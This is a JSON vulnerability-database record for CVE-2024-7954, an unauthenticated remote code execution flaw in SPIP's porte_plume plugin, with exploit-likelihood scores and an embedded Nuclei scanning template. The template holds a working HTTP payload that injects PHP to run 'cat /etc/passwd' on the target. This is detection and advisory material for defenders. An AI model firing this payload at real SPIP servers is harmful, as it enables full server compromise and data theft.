{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-7954/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-7954/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-7954/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-7954/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-7954/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-7954"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-7954"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.90053,
      "kev": false,
      "percentile": 0.99789
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-7954.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2024-7954\n\ninfo:\n  name: SPIP Porte Plume Plugin - Remote Code Execution\n  author: s4e-io\n  severity: critical\n  description: |\n    The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code as the SPIP user, achieving complete server compromise and full control of the SPIP installation and its data.\n  remediation: |\n    Update SPIP to version 4.3.0-alpha2, 4.2.13, or 4.1.16 or later to address the remote code execution vulnerability in the porte_plume plugin.\n  reference:\n    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html\n    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/\n    - https://vulncheck.com/advisories/spip-porte-plume\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-7954\n    - https://github.com/bigb0x/CVE-2024-7954\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-7954\n    cwe-id: CWE-284\n    epss-score: 0.90053\n    epss-percentile: 0.99789\n  metadata:\n    max-request: 1\n    vendor: spip\n    product: spip\n    fofa-query: app=\"SPIP\"\n  tags: cve,cve2024,spip,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /index.php?action=porte_plume_previsu HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'root:.*:0:0:'\n\n      - type: word\n        part: header\n        words:\n          - 'Composed-By: SPIP'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100a9c1642d72c38f482b06b9b603aa04942ab80236a943743f4609278ff6eb15f20220399edec5565cd21c6c43119f75157939a868799a4d8b8199f8c947afce80978e:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-7954"
}